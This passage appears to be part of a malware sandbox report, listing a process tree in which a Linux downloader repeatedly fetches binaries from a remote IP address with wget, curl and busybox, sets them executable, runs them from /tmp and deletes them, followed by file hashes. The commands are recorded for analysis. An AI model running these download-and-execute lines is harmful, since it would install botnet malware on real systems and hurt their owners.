PID:930
-
-
/bin/rmrm IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:931
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:932
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:934
-
-
/bin/chmodchmod 777 XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5./XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:937
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:938
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:940
-
-
/bin/chmodchmod 777 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B./GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:943
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:944
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:946
-
-
/bin/chmodchmod 777 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg./GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:949
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:950
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:952
-
-
/bin/chmodchmod 777 Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw./Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:955
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:956
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:958
-
-
/bin/chmodchmod 777 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH./3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:961
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:962
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:964
-
-
/bin/chmodchmod 777 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h./q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:967
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:968
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:970
-
-
/bin/chmodchmod 777 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM./eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:973
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97